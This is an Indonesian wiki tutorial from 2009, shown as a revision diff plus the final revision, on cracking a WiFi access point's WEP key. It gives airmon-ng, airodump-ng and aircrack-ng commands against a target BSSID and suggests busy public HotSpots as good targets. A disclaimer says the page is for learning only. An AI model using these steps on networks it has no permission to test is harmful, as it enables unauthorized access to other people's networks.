Teknik Menjebol WEP Menggunakan Airodump dan Aircrack: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs)
No edit summary
Onnowpurbo (talk | contribs)
No edit summary
 
(4 intermediate revisions by the same user not shown)
Line 1: Line 1:
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol [[WEP]]. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack [[WEP]]-nya.
'''Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.'''




* Kita perlu mencatat tiga (3) hal, yaitu, (1) BSSID / MAC Addresss AP, (2) MAC address WLAN kita, dan (3) Channel yang digunakan AP.
 
 
 
Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol [[WEP]]. Teknik berikut ini membutuhkan [[traffic]] paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan [[HotSpot]]. Jika tidak ada [[traffic]] sama sekali, sampai kapanpun akan susah untuk di [[crack]] [[WEP]]-nya.
 
 
* Kita perlu mencatat tiga (3) hal, yaitu, (1) [[BSSID]] / [[MAC Addresss]] [[AP]], (2) [[MAC address]] [[WLAN]] kita, dan (3) [[Channel]] yang digunakan [[AP]].




Line 12: Line 18:




Untuk memudahkan operasi ada baiknya melakukan
Untuk memudahkan operasi ada baiknya melakukan di shell


  # export AP=00:30:4F:4E:2B:50
  export AP=00:30:4F:4E:2B:50
  # export WIFI=00:11:6b:33:d3:90
  export WIFI=00:11:6b:33:d3:90
  # export CHANNEL=1
  export CHANNEL=1


Setup supaya interface [[WiFi]] masuk ke mode monitoring menggunakan perintah


Jalankan airodump di WLAN eth1
airmon-ng start wlan0 1


# airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL eth1
Biasanya akan tampil kira-kira sebagai berikut


Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on '''mon0''')


Jalankan aircrack untuk mengcrack WEP
Perhatikan baik-baik bahwa [[interface]] '''wlan0''' yang berubah menjadi mode monitor adalah '''mon0'''. Kita harus menggunakan interface '''mon0''' untuk melakukan monitor.


  # aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs  
Jalankan [[airodump]] di [[WLAN]] mon0
 
  airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0
 
Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah
 
airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0
 
Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..




Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.
Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking [[WEP]] pastikan kita dapat menangkap lebih dari 5000 paket.


Jalankan [[aircrack]] untuk mengcrack [[WEP]]


# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs


misalnya


# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs
# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs


Bisa juga menggunakan perintah


# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs


Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack [[WEP]]




Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan [[HotSpot]].





Latest revision as of 07:56, 25 November 2009

Informasi dan Pengetahuan yang terkandung pada halaman ini maupun turunannya di peruntukan sebagai informasi pembelajaran semata. Pengetahuan ini bukan untuk digunakan untuk melakukan tindak kejahatan maupun melawan hukum. Anda yang melakukan tindak tersebut, berada di luar tanggung jawab penulis tulisan ini & harus berharapan sendiri dengan aparat penegak hukum.



Bagian yang lumayan membuat pusing kepala adalah teknik untuk menjebol WEP. Teknik berikut ini membutuhkan traffic paket yang sangat besar, biasanya akan mudah dilakukan jika ada yang sedang melakukan transfer file di jaringan HotSpot. Jika tidak ada traffic sama sekali, sampai kapanpun akan susah untuk di crack WEP-nya.



Misalnya,

BSSID    00:30:4F:4E:2B:50
WIFI     00:11:6b:33:d3:90
CHANNEL  2


Untuk memudahkan operasi ada baiknya melakukan di shell

export AP=00:30:4F:4E:2B:50
export WIFI=00:11:6b:33:d3:90
export CHANNEL=1

Setup supaya interface WiFi masuk ke mode monitoring menggunakan perintah

airmon-ng start wlan0 1

Biasanya akan tampil kira-kira sebagai berikut

Interface	Chipset		Driver
wlan0		Intel 3945ABG	iwl3945 - [phy0]
				(monitor mode enabled on mon0)

Perhatikan baik-baik bahwa interface wlan0 yang berubah menjadi mode monitor adalah mon0. Kita harus menggunakan interface mon0 untuk melakukan monitor.

Jalankan airodump di WLAN mon0

airodump-ng --ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Versi backtrack 4.0 pre-final ternyata harus menggunakan perintah

airodump-ng --output-format ivs -w hasilcapture --bssid $AP --channel $CHANNEL mon0

Pastikan menggunakan switch --bssid ini akan mempercepat proses cracking :) ..


Dalam contoh paket hasil monitoring akan di simpan di file hasilcapture. Agar memudahkan proses cracking WEP pastikan kita dapat menangkap lebih dari 5000 paket.

Jalankan aircrack untuk mengcrack WEP

# aircrack-ng -a 1 -e essidapyangakandicrack -n 64 hasilcapture-01.ivs 

misalnya

# aircrack-ng -a 1 -e linksys -n 64 hasilcapture-01.ivs 
# aircrack-ng -a 1 -e $AP -n 64 hasilcapture-01.ivs 

Bisa juga menggunakan perintah

# aircrack-ng -a 1 -n 64 hasilcapture-01.ivs 

Switch -a 1 digunakan untuk menset aircrack-ng agar meng-crack WEP


Anda akan membutuhkan banyak IVS, pastikan traffic cukup tinggi. Hal ini akan mudah jika ada yang sedang transfer file di jaringan HotSpot.


Pranala Menarik